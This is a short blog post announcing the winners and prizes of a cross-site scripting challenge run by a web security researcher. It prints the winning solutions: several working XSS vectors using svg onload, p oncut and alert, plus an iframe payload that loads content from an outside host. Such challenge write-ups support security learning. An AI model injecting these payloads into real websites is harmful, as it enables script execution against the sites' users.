David Sopas – Web Security Researcher

ashar javed

19/08/15 Bug Bounty , Challenge # , , , , ,

Results for the XSS challenge

For the first challenge it was very interesting. It was easy challenge but it’s a start. New challenges will be up soon.

The winners are [they were the first ones to give one solution]:

1º Luciano Corsalini – $50 Amazon gift card

#<svg/onload=alert(`xss`)>

2º Kenan – $25 Amazon gift card

#<svg/onload=alert(/xss/)>

For the bonus prize it wasn’t easy to choose. I decided to give $25 Amazon gift card to the most creative XSS vector.

The winner was Abdulrahman Alqabandi

#<iframe/src=//14.rs>

Also I would like to share another pretty good solution from Ashar Javed:

<p/oncut=alert`xss`>x

Congratulations to the winners and to all participants. Thanks for your time and effort.
Winners will be contacted soon by email.

 

3 responses